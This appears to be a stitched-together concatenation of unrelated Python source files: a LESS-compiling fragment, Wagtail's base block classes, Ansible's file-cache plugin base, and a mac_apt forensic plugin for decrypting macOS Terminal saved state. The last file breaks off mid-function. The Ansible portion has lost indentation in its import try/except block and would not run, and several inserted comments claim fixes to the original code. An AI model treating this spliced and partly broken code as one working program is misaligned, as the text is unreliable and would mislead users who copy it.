			print("compiling {0}".format(fpath))
			css_path = os.path.join(path, "public", "css", fname.rsplit(".", 1)[0] + ".css")
			os.system("lessc {0} > {1}".format(fpath, css_path))
| |
from __future__ import absolute_import, unicode_literals
# unicode_literals ensures that any render / __str__ methods returning HTML via calls to mark_safe / format_html
# return a SafeText, not SafeBytes; necessary so that it doesn't get re-encoded when the template engine
# calls force_text, which would cause it to lose its 'safe' flag
import collections
from importlib import import_module
from django.core import checks
from django.core.exceptions import ImproperlyConfigured
from django.utils import six
from django.utils.safestring import mark_safe
from django.utils.text import capfirst
from django.utils.encoding import force_text
from django.template.loader import render_to_string
from django import forms
__all__ = ['BaseBlock', 'Block', 'BoundBlock', 'DeclarativeSubBlocksMetaclass', 'BlockWidget', 'BlockField']
# =========================================
# Top-level superclasses and helper objects
# =========================================
class BaseBlock(type):
    """Metaclass that turns an inner ``Meta`` declaration into a synthesized
    ``_meta_class`` attribute, layered on top of any ``_meta_class`` inherited
    from base classes."""
    def __new__(mcs, name, bases, attrs):
        # remove the declared Meta (if any) so it doesn't live on the class
        declared_meta = attrs.pop('Meta', None)
        cls = super(BaseBlock, mcs).__new__(mcs, name, bases, attrs)
        inherited_meta = getattr(cls, '_meta_class', None)
        # declared Meta takes precedence over the inherited one in the MRO
        meta_bases = tuple(
            candidate for candidate in (declared_meta, inherited_meta)
            if candidate
        ) or ()
        cls._meta_class = type(str(name + 'Meta'), meta_bases + (object, ), {})
        return cls
class Block(six.with_metaclass(BaseBlock, object)):
    """Abstract base for all block types.

    A Block defines how a value is edited (render_form / value_from_datadict),
    validated (clean), serialised (to_python / get_prep_value) and displayed
    (render / render_basic). Instances are associated with concrete values via
    bind(), which returns a BoundBlock.
    """
    # assigned via set_name() when the block is attached to a container
    name = ''
    # global instance counter; gives each block a stable creation order
    creation_counter = 0
    # name under which the value is exposed to templates in render()
    TEMPLATE_VAR = 'value'
    class Meta:
        label = None
        icon = "placeholder"
        classname = None
    """
    Setting a 'dependencies' list serves as a shortcut for the common case where a complex block type
    (such as struct, list or stream) relies on one or more inner block objects, and needs to ensure that
    the responses from the 'media' and 'html_declarations' include the relevant declarations for those inner
    blocks, as well as its own. Specifying these inner block objects in a 'dependencies' list means that
    the base 'media' and 'html_declarations' methods will return those declarations; the outer block type can
    then add its own declarations to the list by overriding those methods and using super().
    """
    dependencies = []
    def __new__(cls, *args, **kwargs):
        # adapted from django.utils.deconstruct.deconstructible; capture the arguments
        # so that we can return them in the 'deconstruct' method
        obj = super(Block, cls).__new__(cls)
        obj._constructor_args = (args, kwargs)
        return obj
    def all_blocks(self):
        """
        Return a list consisting of self and all block objects that are direct or indirect dependencies
        of this block
        """
        result = [self]
        for dep in self.dependencies:
            result.extend(dep.all_blocks())
        return result
    def all_media(self):
        """Combine the form media of this block and all its dependencies."""
        media = forms.Media()
        for block in self.all_blocks():
            media += block.media
        return media
    def all_html_declarations(self):
        """Concatenate the non-empty html_declarations of this block and its dependencies."""
        declarations = filter(bool, [block.html_declarations() for block in self.all_blocks()])
        return mark_safe('\n'.join(declarations))
    def __init__(self, **kwargs):
        # kwargs override the declared Meta options on a per-instance basis
        self.meta = self._meta_class()
        for attr, value in kwargs.items():
            setattr(self.meta, attr, value)
        # Increase the creation counter, and save our local copy.
        self.creation_counter = Block.creation_counter
        Block.creation_counter += 1
        self.definition_prefix = 'blockdef-%d' % self.creation_counter
        self.label = self.meta.label or ''
    def set_name(self, name):
        # derive a human-readable label from the name unless one was declared
        self.name = name
        if not self.meta.label:
            self.label = capfirst(force_text(name).replace('_', ' '))
    @property
    def media(self):
        # subclasses override this to declare their own form media
        return forms.Media()
    def html_declarations(self):
        """
        Return an HTML fragment to be rendered on the form page once per block definition -
        as opposed to once per occurrence of the block. For example, the block definition
            ListBlock(label="Shopping list", CharBlock(label="Product"))
        needs to output a <script type="text/template"></script> block containing the HTML for
        a 'product' text input, to that these can be dynamically added to the list. This
        template block must only occur once in the page, even if there are multiple 'shopping list'
        blocks on the page.
        Any element IDs used in this HTML fragment must begin with definition_prefix.
        (More precisely, they must either be definition_prefix itself, or begin with definition_prefix
        followed by a '-' character)
        """
        return ''
    def js_initializer(self):
        """
        Returns a Javascript expression string, or None if this block does not require any
        Javascript behaviour. This expression evaluates to an initializer function, a function that
        takes the ID prefix and applies JS behaviour to the block instance with that value and prefix.
        The parent block of this block (or the top-level page code) must ensure that this
        expression is not evaluated more than once. (The resulting initializer function can and will be
        called as many times as there are instances of this block, though.)
        """
        return None
    def render_form(self, value, prefix='', errors=None):
        """
        Render the HTML for this block with 'value' as its content.
        """
        raise NotImplementedError('%s.render_form' % self.__class__)
    def value_from_datadict(self, data, files, prefix):
        # extract this block's value from submitted form data; must be
        # implemented by concrete subclasses
        raise NotImplementedError('%s.value_from_datadict' % self.__class__)
    def bind(self, value, prefix=None, errors=None):
        """
        Return a BoundBlock which represents the association of this block definition with a value
        and a prefix (and optionally, a ValidationError to be rendered).
        BoundBlock primarily exists as a convenience to allow rendering within templates:
        bound_block.render() rather than blockdef.render(value, prefix) which can't be called from
        within a template.
        """
        return BoundBlock(self, value, prefix=prefix, errors=errors)
    def get_default(self):
        """
        Return this block's default value (conventionally found in self.meta.default),
        converted to the value type expected by this block. This caters for the case
        where that value type is not something that can be expressed statically at
        model definition type (e.g. something like StructValue which incorporates a
        pointer back to the block definion object).
        """
        return self.meta.default
    def prototype_block(self):
        """
        Return a BoundBlock that can be used as a basis for new empty block instances to be added on the fly
        (new list items, for example). This will have a prefix of '__PREFIX__' (to be dynamically replaced with
        a real prefix when it's inserted into the page) and a value equal to the block's default value.
        """
        return self.bind(self.get_default(), '__PREFIX__')
    def clean(self, value):
        """
        Validate value and return a cleaned version of it, or throw a ValidationError if validation fails.
        The thrown ValidationError instance will subsequently be passed to render() to display the
        error message; the ValidationError must therefore include all detail necessary to perform that
        rendering, such as identifying the specific child block(s) with errors, in the case of nested
        blocks. (It is suggested that you use the 'params' attribute for this; using error_list /
        error_dict is unreliable because Django tends to hack around with these when nested.)
        """
        return value
    def to_python(self, value):
        """
        Convert 'value' from a simple (JSON-serialisable) value to a (possibly complex) Python value to be
        used in the rest of the block API and within front-end templates . In simple cases this might be
        the value itself; alternatively, it might be a 'smart' version of the value which behaves mostly
        like the original value but provides a native HTML rendering when inserted into a template; or it
        might be something totally different (e.g. an image chooser will use the image ID as the clean
        value, and turn this back into an actual image object here).
        """
        return value
    def get_prep_value(self, value):
        """
        The reverse of to_python; convert the python value into JSON-serialisable form.
        """
        return value
    def render(self, value):
        """
        Return a text rendering of 'value', suitable for display on templates. By default, this will
        use a template if a 'template' property is specified on the block, and fall back on render_basic
        otherwise.
        """
        template = getattr(self.meta, 'template', None)
        if template:
            # the value is exposed both as 'self' (legacy) and TEMPLATE_VAR
            return render_to_string(template, {
                'self': value,
                self.TEMPLATE_VAR: value,
            })
        else:
            return self.render_basic(value)
    def render_basic(self, value):
        """
        Return a text rendering of 'value', suitable for display on templates. render() will fall back on
        this if the block does not define a 'template' property.
        """
        return force_text(value)
    def get_searchable_content(self, value):
        """
        Returns a list of strings containing text content within this block to be used in a search engine.
        """
        return []
    def check(self, **kwargs):
        """
        Hook for the Django system checks framework -
        returns a list of django.core.checks.Error objects indicating validity errors in the block
        """
        return []
    def _check_name(self, **kwargs):
        """
        Helper method called by container blocks as part of the system checks framework,
        to validate that this block's name is a valid identifier.
        (Not called universally, because not all blocks need names)
        """
        errors = []
        if not self.name:
            errors.append(checks.Error(
                "Block name %r is invalid" % self.name,
                hint="Block name cannot be empty",
                obj=kwargs.get('field', self),
                id='wagtailcore.E001',
            ))
        if ' ' in self.name:
            errors.append(checks.Error(
                "Block name %r is invalid" % self.name,
                hint="Block names cannot contain spaces",
                obj=kwargs.get('field', self),
                id='wagtailcore.E001',
            ))
        if '-' in self.name:
            errors.append(checks.Error(
                "Block name %r is invalid" % self.name,
                # second positional argument to checks.Error is the hint
                "Block names cannot contain dashes",
                obj=kwargs.get('field', self),
                id='wagtailcore.E001',
            ))
        if self.name and self.name[0].isdigit():
            errors.append(checks.Error(
                "Block name %r is invalid" % self.name,
                # second positional argument to checks.Error is the hint
                "Block names cannot begin with a digit",
                obj=kwargs.get('field', self),
                id='wagtailcore.E001',
            ))
        return errors
    def id_for_label(self, prefix):
        """
        Return the ID to be used as the 'for' attribute of <label> elements that refer to this block,
        when the given field prefix is in use. Return None if no 'for' attribute should be used.
        """
        return None
    def deconstruct(self):
        # adapted from django.utils.deconstruct.deconstructible
        module_name = self.__module__
        name = self.__class__.__name__
        # Make sure it's actually there and not an inner class
        module = import_module(module_name)
        if not hasattr(module, name):
            raise ValueError(
                "Could not find object %s in %s.\n"
                "Please note that you cannot serialize things like inner "
                "classes. Please move the object into the main module "
                "body to use migrations.\n"
                % (name, module_name))
        # if the module defines a DECONSTRUCT_ALIASES dictionary, see if the class has an entry in there;
        # if so, use that instead of the real path
        try:
            path = module.DECONSTRUCT_ALIASES[self.__class__]
        except (AttributeError, KeyError):
            path = '%s.%s' % (module_name, name)
        return (
            path,
            self._constructor_args[0],
            self._constructor_args[1],
        )
    def __eq__(self, other):
        """
        The deep_deconstruct method in django.db.migrations.autodetector.MigrationAutodetector does not
        recurse into arbitrary lists and dicts. As a result, when it is passed a field such as:
            StreamField([
                ('heading', CharBlock()),
            ])
        the CharBlock object will be left in its constructed form. This causes problems when
        MigrationAutodetector compares two separate instances of the StreamField from different project
        states: since the CharBlocks are different objects, it will report a change where there isn't one.
        To prevent this, we implement the equality operator on Block instances such that the two CharBlocks
        are reported as equal. Since block objects are intended to be immutable with the exception of
        set_name(), it is sufficient to compare the 'name' property and the constructor args/kwargs of the
        two block objects. The 'deconstruct' method provides a convenient way to access the latter.
        """
        if not isinstance(other, Block):
            # if the other object isn't a block at all, it clearly isn't equal.
            return False
        # Note that we do not require the two blocks to be of the exact same class. This is because
        # we may wish the following blocks to be considered equal:
        #
        # class FooBlock(StructBlock):
        #     first_name = CharBlock()
        #     surname = CharBlock()
        #
        # class BarBlock(StructBlock):
        #     first_name = CharBlock()
        #     surname = CharBlock()
        #
        # FooBlock() == BarBlock() == StructBlock([('first_name', CharBlock()), ('surname': CharBlock())])
        #
        # For this to work, StructBlock will need to ensure that 'deconstruct' returns the same signature
        # in all of these cases, including reporting StructBlock as the path:
        #
        # FooBlock().deconstruct() == (
        #     'wagtail.wagtailcore.blocks.StructBlock',
        #     [('first_name', CharBlock()), ('surname': CharBlock())],
        #     {}
        # )
        #
        # This has the bonus side effect that the StructBlock field definition gets frozen into
        # the migration, rather than leaving the migration vulnerable to future changes to FooBlock / BarBlock
        # in models.py.
        return (self.name == other.name) and (self.deconstruct() == other.deconstruct())
    def __ne__(self, other):
        # needed on Python 2, which does not derive != from __eq__
        return not self.__eq__(other)
    # Making block instances hashable in a way that's consistent with __eq__ is non-trivial, because
    # self.deconstruct() is liable to contain unhashable data (e.g. lists and dicts). So let's set
    # Block to be explicitly unhashable - Python 3 will do this automatically when defining __eq__,
    # but Python 2 won't, and we'd like the behaviour to be consistent on both.
    __hash__ = None
class BoundBlock(object):
    """Pairs a block definition with a value (plus optional prefix and
    validation errors) so that templates can call render()/render_form()
    without passing extra arguments."""
    def __init__(self, block, value, prefix=None, errors=None):
        self.block = block
        self.value = value
        self.prefix = prefix
        self.errors = errors

    def render(self):
        """Front-end rendering of the bound value."""
        return self.block.render(self.value)

    def render_form(self):
        """Editing-form rendering of the bound value, including any errors."""
        return self.block.render_form(self.value, self.prefix, errors=self.errors)

    def id_for_label(self):
        """Delegate label-ID lookup to the block definition for our prefix."""
        return self.block.id_for_label(self.prefix)
class DeclarativeSubBlocksMetaclass(BaseBlock):
    """
    Metaclass that collects sub-blocks declared on the base classes.
    (cheerfully stolen from https://github.com/django/django/blob/master/django/forms/forms.py)
    """
    def __new__(mcs, name, bases, attrs):
        # Collect sub-blocks declared on the current class.
        # These are available on the class as `declared_blocks`
        current_blocks = []
        for key, value in list(attrs.items()):
            if isinstance(value, Block):
                current_blocks.append((key, value))
                # the attribute name becomes the sub-block's name, and the
                # Block instance is removed from the class namespace
                value.set_name(key)
                attrs.pop(key)
        # preserve declaration order via each block's creation counter
        current_blocks.sort(key=lambda x: x[1].creation_counter)
        attrs['declared_blocks'] = collections.OrderedDict(current_blocks)
        new_class = (super(DeclarativeSubBlocksMetaclass, mcs).__new__(
            mcs, name, bases, attrs))
        # Walk through the MRO, collecting all inherited sub-blocks, to make
        # the combined `base_blocks`.
        base_blocks = collections.OrderedDict()
        for base in reversed(new_class.__mro__):
            # Collect sub-blocks from base class.
            if hasattr(base, 'declared_blocks'):
                base_blocks.update(base.declared_blocks)
            # Field shadowing: setting an attribute to None on a subclass
            # removes the sub-block inherited under that name.
            for attr, value in base.__dict__.items():
                if value is None and attr in base_blocks:
                    base_blocks.pop(attr)
        new_class.base_blocks = base_blocks
        return new_class
# ========================
# django.forms integration
# ========================
class BlockWidget(forms.Widget):
    """Wraps a block object as a widget so that it can be incorporated into a Django form"""
    def __init__(self, block_def, attrs=None):
        super(BlockWidget, self).__init__(attrs=attrs)
        self.block_def = block_def
    def render_with_errors(self, name, value, attrs=None, errors=None):
        # bind the value so the block can render itself with errors attached
        bound_block = self.block_def.bind(value, prefix=name, errors=errors)
        js_initializer = self.block_def.js_initializer()
        if js_initializer:
            # run the block's JS initializer against this widget's name/prefix
            # once the page has loaded
            js_snippet = """
                <script>
                    $(function() {
                        var initializer = %s;
                        initializer('%s');
                    })
                </script>
            """ % (js_initializer, name)
        else:
            js_snippet = ''
        return mark_safe(bound_block.render_form() + js_snippet)
    def render(self, name, value, attrs=None):
        # standard Django Widget entry point; no error information available here
        return self.render_with_errors(name, value, attrs=attrs, errors=None)
    @property
    def media(self):
        # include the media of the block and all its dependencies
        return self.block_def.all_media()
    def value_from_datadict(self, data, files, name):
        # delegate form-data extraction to the block definition
        return self.block_def.value_from_datadict(data, files, name)
class BlockField(forms.Field):
    """Wraps a block object as a form field so that it can be incorporated into a Django form"""
    def __init__(self, block=None, **kwargs):
        # 'block' is keyword-with-default only to fit Field's signature
        # conventions; it is in fact required
        if block is None:
            raise ImproperlyConfigured("BlockField was not passed a 'block' object")
        self.block = block
        # default to a BlockWidget wrapping the same block, unless the
        # caller supplied an explicit widget
        if 'widget' not in kwargs:
            kwargs['widget'] = BlockWidget(block)
        super(BlockField, self).__init__(**kwargs)
    def clean(self, value):
        # delegate validation/cleaning to the wrapped block
        return self.block.clean(value)
# Consulted by Block.deconstruct(): migrations freeze the stable public
# import path listed here instead of the class's real module path.
DECONSTRUCT_ALIASES = {
    Block: 'wagtail.wagtailcore.blocks.Block',
}
| |
# (c) 2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import time
import errno
from abc import ABCMeta, abstractmethod
from ansible import constants as C
from ansible.errors import AnsibleError
from ansible.module_utils.six import with_metaclass
from ansible.module_utils._text import to_bytes
from ansible.module_utils.common._collections_compat import MutableMapping
from ansible.plugins.loader import cache_loader
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class BaseCacheModule(with_metaclass(ABCMeta, object)):
    """Abstract interface that every Ansible cache plugin must implement."""

    # Backwards compat only. Just import the global display instead
    _display = display

    @abstractmethod
    def get(self, key):
        """Return the cached value stored under ``key``."""
        pass

    @abstractmethod
    def set(self, key, value):
        """Store ``value`` in the cache under ``key``."""
        pass

    @abstractmethod
    def keys(self):
        """Return the keys currently present in the cache."""
        pass

    @abstractmethod
    def contains(self, key):
        """Return whether ``key`` exists in the cache."""
        pass

    @abstractmethod
    def delete(self, key):
        """Remove ``key`` (and its value) from the cache."""
        pass

    @abstractmethod
    def flush(self):
        """Remove every entry from the cache."""
        pass

    @abstractmethod
    def copy(self):
        """Return a copy of the cache's contents."""
        pass
class BaseFileCacheModule(BaseCacheModule):
    """
    A caching module backed by file based storage.
    Each key maps to one file inside the configured cache directory; an
    in-memory dict (self._cache) fronts the files for the duration of a run.
    Concrete subclasses supply the serialization via _load()/_dump().
    """
    def __init__(self, *args, **kwargs):
        # Plugin name is derived from the module's filename (e.g. 'jsonfile').
        self.plugin_name = self.__module__.split('.')[-1]
        self._timeout = float(C.CACHE_PLUGIN_TIMEOUT)
        self._cache = {}
        self._cache_dir = self._get_cache_connection(C.CACHE_PLUGIN_CONNECTION)
        self._set_inventory_cache_override(**kwargs)
        self.validate_cache_connection()
    def _get_cache_connection(self, source):
        # Expand '~' and environment variables in the configured path.
        # NOTE(review): returns None implicitly when source is falsy or not a
        # string (TypeError) -- callers must handle a None cache dir.
        if source:
            try:
                return os.path.expanduser(os.path.expandvars(source))
            except TypeError:
                pass
    def _set_inventory_cache_override(self, **kwargs):
        # Allow per-instantiation kwargs to override the globally configured
        # timeout and cache directory (used by the inventory cache).
        if kwargs.get('cache_timeout'):
            self._timeout = kwargs.get('cache_timeout')
        if kwargs.get('cache_connection'):
            self._cache_dir = self._get_cache_connection(kwargs.get('cache_connection'))
    def validate_cache_connection(self):
        # Ensure the cache dir is configured, exists (creating it if needed)
        # and carries read/write/execute permission; raise AnsibleError otherwise.
        if not self._cache_dir:
            raise AnsibleError("error, '%s' cache plugin requires the 'fact_caching_connection' config option "
                               "to be set (to a writeable directory path)" % self.plugin_name)
        if not os.path.exists(self._cache_dir):
            try:
                os.makedirs(self._cache_dir)
            except (OSError, IOError) as e:
                raise AnsibleError("error in '%s' cache plugin while trying to create cache dir %s : %s" % (self.plugin_name, self._cache_dir, to_bytes(e)))
        else:
            for x in (os.R_OK, os.W_OK, os.X_OK):
                if not os.access(self._cache_dir, x):
                    raise AnsibleError("error in '%s' cache, configured path (%s) does not have necessary permissions (rwx), disabling plugin" % (
                        self.plugin_name, self._cache_dir))
    def get(self, key):
        """ This checks the in memory cache first as the fact was not expired at 'gather time'
        and it would be problematic if the key did expire after some long running tasks and
        user gets 'undefined' error in the same play """
        if key not in self._cache:
            if self.has_expired(key) or key == "":
                raise KeyError
            cachefile = "%s/%s" % (self._cache_dir, key)
            try:
                value = self._load(cachefile)
                self._cache[key] = value
            except ValueError as e:
                # ValueError from _load() indicates an unparseable file: remove
                # it so the next run starts clean, then fail loudly.
                display.warning("error in '%s' cache plugin while trying to read %s : %s. "
                                "Most likely a corrupt file, so erasing and failing." % (self.plugin_name, cachefile, to_bytes(e)))
                self.delete(key)
                raise AnsibleError("The cache file %s was corrupt, or did not otherwise contain valid data. "
                                   "It has been removed, so you can re-run your command now." % cachefile)
            except (OSError, IOError) as e:
                # Unreadable/missing file is treated the same as a cache miss.
                display.warning("error in '%s' cache plugin while trying to read %s : %s" % (self.plugin_name, cachefile, to_bytes(e)))
                raise KeyError
            except Exception as e:
                raise AnsibleError("Error while decoding the cache file %s: %s" % (cachefile, to_bytes(e)))
        return self._cache.get(key)
    def set(self, key, value):
        # Write-through: update memory first, then persist to disk.
        self._cache[key] = value
        cachefile = "%s/%s" % (self._cache_dir, key)
        try:
            self._dump(value, cachefile)
        except (OSError, IOError) as e:
            # Best effort: a failed disk write still leaves the value cached in memory.
            display.warning("error in '%s' cache plugin while trying to write to %s : %s" % (self.plugin_name, cachefile, to_bytes(e)))
    def has_expired(self, key):
        # Return True (and evict the in-memory copy) when the backing file's
        # mtime is older than the configured timeout; timeout 0 disables expiry.
        if self._timeout == 0:
            return False
        cachefile = "%s/%s" % (self._cache_dir, key)
        try:
            st = os.stat(cachefile)
        except (OSError, IOError) as e:
            if e.errno == errno.ENOENT:
                # No file on disk means nothing to expire.
                return False
            else:
                display.warning("error in '%s' cache plugin while trying to stat %s : %s" % (self.plugin_name, cachefile, to_bytes(e)))
                return False
        if time.time() - st.st_mtime <= self._timeout:
            return False
        if key in self._cache:
            del self._cache[key]
        return True
    def keys(self):
        # Directory listing is the source of truth; hidden files and expired
        # entries are filtered out.
        keys = []
        for k in os.listdir(self._cache_dir):
            if not (k.startswith('.') or self.has_expired(k)):
                keys.append(k)
        return keys
    def contains(self, key):
        cachefile = "%s/%s" % (self._cache_dir, key)
        if key in self._cache:
            return True
        if self.has_expired(key):
            return False
        try:
            os.stat(cachefile)
            return True
        except (OSError, IOError) as e:
            if e.errno == errno.ENOENT:
                return False
            else:
                # NOTE(review): on a non-ENOENT stat error this falls through
                # and implicitly returns None (falsy) -- presumably a deliberate
                # best-effort "not cached" answer; confirm before changing.
                display.warning("error in '%s' cache plugin while trying to stat %s : %s" % (self.plugin_name, cachefile, to_bytes(e)))
    def delete(self, key):
        # Remove from memory and disk; both removals tolerate a missing entry.
        try:
            del self._cache[key]
        except KeyError:
            pass
        try:
            os.remove("%s/%s" % (self._cache_dir, key))
        except (OSError, IOError):
            pass # TODO: only pass on non existing?
    def flush(self):
        # Drop the memory cache, then delete every non-expired file on disk.
        self._cache = {}
        for key in self.keys():
            self.delete(key)
    def copy(self):
        # Materialize all non-expired entries into a plain dict.
        ret = dict()
        for key in self.keys():
            ret[key] = self.get(key)
        return ret
    @abstractmethod
    def _load(self, filepath):
        """
        Read data from a filepath and return it as a value
        :arg filepath: The filepath to read from.
        :returns: The value stored in the filepath
        This method reads from the file on disk and takes care of any parsing
        and transformation of the data before returning it.  The value
        returned should be what Ansible would expect if it were uncached data.
        .. note:: Filehandles have advantages but calling code doesn't know
            whether this file is text or binary, should be decoded, or accessed via
            a library function.  Therefore the API uses a filepath and opens
            the file inside of the method.
        """
        pass
    @abstractmethod
    def _dump(self, value, filepath):
        """
        Write data to a filepath
        :arg value: The value to store
        :arg filepath: The filepath to store it at
        """
        pass
class FactCache(MutableMapping):
    """Dict-like facade over the configured cache plugin, used for host facts."""
    def __init__(self, *args, **kwargs):
        self._plugin = cache_loader.get(C.CACHE_PLUGIN)
        if not self._plugin:
            raise AnsibleError('Unable to load the facts cache plugin (%s).' % (C.CACHE_PLUGIN))
        # Backwards compat: self._display isn't really needed, just import the global display and use that.
        self._display = display
        # in memory cache so plugins don't expire keys mid run
        self._cache = {}
    def __getitem__(self, key):
        # Delegate both the existence check and the fetch to the plugin.
        if not self._plugin.contains(key):
            raise KeyError
        return self._plugin.get(key)
    def __setitem__(self, key, value):
        self._plugin.set(key, value)
    def __delitem__(self, key):
        self._plugin.delete(key)
    def __contains__(self, key):
        return self._plugin.contains(key)
    def __iter__(self):
        return iter(self._plugin.keys())
    def __len__(self):
        return len(self._plugin.keys())
    def copy(self):
        """ Return a primitive copy of the keys and values from the cache. """
        return dict(self)
    def keys(self):
        return self._plugin.keys()
    def flush(self):
        """ Flush the fact cache of all keys. """
        self._plugin.flush()
    def update(self, key, value):
        # Merge `value` into the cached dict stored under `key` and persist it.
        # NOTE(review): this signature differs from MutableMapping.update(other);
        # presumably deliberate, but it shadows the standard mapping API.
        host_cache = self._plugin.get(key)
        host_cache.update(value)
        self._plugin.set(key, host_cache)
class InventoryFileCacheModule(BaseFileCacheModule):
    """
    A caching module backed by file based storage, specialized for the
    inventory cache: it wraps a concrete cache plugin (chosen by name) and
    delegates serialization to it.
    """
    def __init__(self, plugin_name, timeout, cache_dir):
        self.plugin_name = plugin_name
        self._timeout = timeout
        self._cache = {}
        self._cache_dir = self._get_cache_connection(cache_dir)
        self.validate_cache_connection()
        self._plugin = self.get_plugin(plugin_name)
    def validate_cache_connection(self):
        # Re-raise the base-class failure with inventory-specific guidance.
        # Fixes in the message vs. the original: "requires the one of" ->
        # "requires one of", the ansible.cfg section is "[defaults]" (not
        # "[default]"), and a newline now separates the env-var list from the
        # trailing sentence (previously rendered as "CONNECTION.to be set").
        try:
            super(InventoryFileCacheModule, self).validate_cache_connection()
        except AnsibleError:
            raise AnsibleError("error, '%s' inventory cache plugin requires one of the following to be set:\n"
                               "ansible.cfg:\n[defaults]: fact_caching_connection,\n[inventory]: cache_connection;\n"
                               "Environment:\nANSIBLE_INVENTORY_CACHE_CONNECTION,\nANSIBLE_CACHE_PLUGIN_CONNECTION\n"
                               "to be set to a writeable directory path" % self.plugin_name)
    def get(self, cache_key):
        """Return the cached value for cache_key; raise KeyError when absent."""
        if not self.contains(cache_key):
            # Check if cache file exists
            raise KeyError
        return super(InventoryFileCacheModule, self).get(cache_key)
    def get_plugin(self, plugin_name):
        """Load and return the named cache plugin, configured with this
        module's cache dir and timeout; raise AnsibleError when unavailable."""
        plugin = cache_loader.get(plugin_name, cache_connection=self._cache_dir, cache_timeout=self._timeout)
        if not plugin:
            raise AnsibleError('Unable to load the facts cache plugin (%s).' % (plugin_name))
        self._cache = {}
        return plugin
    def _load(self, path):
        # Serialization format is owned by the wrapped plugin.
        return self._plugin._load(path)
    def _dump(self, value, path):
        return self._plugin._dump(value, path)
| |
'''
Copyright (c) 2017 Yogesh Khatri
This file is part of mac_apt (macOS Artifact Parsing Tool).
Usage or distribution of this software/code is subject to the
terms of the MIT License.
terminalstate.py
---------------
This plugin reads Terminal Saved State information which includes
full text content of terminal window.
'''
import io
import logging
import nska_deserialize as nd
import os
import struct
from Crypto.Cipher import AES
from plugins.helpers.common import CommonFunctions
from plugins.helpers.macinfo import *
from plugins.helpers.writer import *
__Plugin_Name = "TERMINALSTATE" # Cannot have spaces, and must be all caps!
__Plugin_Friendly_Name = "Terminal Saved State"
__Plugin_Version = "1.0"
__Plugin_Description = "Reads Terminal saved state files which includes full text content of terminal windows"
__Plugin_Author = "Yogesh Khatri"
__Plugin_Author_Email = "yogesh@swiftforensics.com"
__Plugin_Modes = "MACOS,ARTIFACTONLY" # Valid values are 'MACOS', 'IOS, 'ARTIFACTONLY'
__Plugin_ArtifactOnly_Usage = 'Provide the folder /Users/<USER>/Library/Saved Application State/com.apple.Terminal.savedState as input'
log = logging.getLogger('MAIN.' + __Plugin_Name) # Do not rename or remove this ! This is the logger object
#---- Do not change the variable names in above section ----#
class TerminalWindowInfo():
    '''Plain record holding one recovered terminal window's data.'''
    def __init__(self, title, working_dir, content, user, source):
        # Pure data carrier: every field is stored verbatim.
        self.title = title
        self.working_dir = working_dir
        self.content = content
        self.user = user
        self.source = source
def PrintAll(terminals, output_params):
    '''Write every collected terminal saved-state entry out via WriteList.'''
    terminal_info = [ ('Title',DataType.TEXT),('WorkingDir',DataType.TEXT),('Content',DataType.TEXT),
                      ('User', DataType.TEXT),('Source',DataType.TEXT)
                    ]
    log.info (str(len(terminals)) + " terminal saved state(s) found")
    # Flatten each record into the column order declared above.
    terminals_list = [[t.title, t.working_dir, t.content, t.user, t.source] for t in terminals]
    WriteList("terminal saved state", "TerminalState", terminals_list, terminal_info, output_params, '')
def get_decoded_plist_data(data):
    '''Parse a decrypted saved-state record and deserialize its embedded
    NSKeyedArchiver plist.
    Record layout (big-endian, offsets after the 4-byte prefix):
      [4:8]   length of the class-name field
      [8:8+n] class name (bytes, e.g. b'_NSWindow')
      then a 4-byte "rchv" magic, a 4-byte plist length, and the plist itself.
    Returns (name, deserialized_plist); the plist is None on any failure.
    '''
    data_size = len(data)
    name = ''
    if data_size > 8:
        name_len = struct.unpack('>I', data[4:8])[0]
        name = data[8 : 8 + name_len]
        log.debug('NSName = {}'.format(name))
        rchv = data[8 + name_len : 12 + name_len] # "rchv"
        if rchv != b"rchv":
            # Unexpected magic is logged but parsing continues best-effort.
            log.warning('magic was not "rchv", it was {}'.format(str(rchv)))
        nsa_plist_len = struct.unpack('>I', data[12 + name_len : 16 + name_len])[0]
        nsa_plist = data[16 + name_len : 16 + name_len + nsa_plist_len]
        f = io.BytesIO(nsa_plist)
        try:
            deserialized_plist = nd.deserialize_plist(f)
        # NOTE(review): 'plistlib' is not imported at the top of this file --
        # presumably supplied via 'from plugins.helpers.macinfo import *'; confirm.
        except (nd.DeserializeError, nd.biplist.NotBinaryPlistException,
                nd.biplist.InvalidPlistException,plistlib.InvalidFileException,
                nd.ccl_bplist.BplistError, ValueError, TypeError,
                OSError, OverflowError) as ex:
            log.exception("")
            f.close()
            return (name, None)
        f.close()
        return (name, deserialized_plist)
    else:
        log.warning('Plist seems empty!')
        return (name, None)
def get_key_for_window_id(plist, ns_window_id):
    '''Return the NSDataKey (AES key bytes) for the window whose NSWindowID
    equals ns_window_id, searching the parsed windows.plist entries.
    Returns None when no entry matches or the matching entry has no key.'''
    key = None
    for item in plist:
        w_id = item.get('NSWindowID', None)
        if w_id == ns_window_id:
            key = item.get('NSDataKey', None)
            # Idiom fix: compare to None with 'is', not '=='.
            if key is None:
                log.error("Error fetching key, key was not found for windowID={}!".format(ns_window_id))
            # Window IDs are unique, so stop at the first match.
            break
    return key
def decrypt(enc_data, key, iv):
    '''Decrypts the data given encrypted data, key and IV'''
    try:
        # One AES-CBC cipher per call; return the raw decrypted bytes.
        aes_cbc = AES.new(key, AES.MODE_CBC, iv)
        return aes_cbc.decrypt(enc_data)
    except (KeyError, ValueError) as ex:
        log.exception('Decryption error:')
        return b''
def ParseTerminalPlist_NSWindow(plist):
    '''Returns terminal (Title, Working Dir, Contents) as a tuple.
    `plist` is expected to be a list of dicts from the deserialized _NSWindow
    archive; a dict (or anything non-iterable-of-dicts) yields empty fields.'''
    title = ''
    working_dir = ''
    contents = ''
    if isinstance(plist, dict):
        # BUG FIX: the original returned None here, but the caller unpacks a
        # 3-tuple, which would raise TypeError. Return empty fields instead.
        return (title, working_dir, contents)
    try:
        for item in plist:
            for k, v in item.items():
                if k == 'NSTitle':
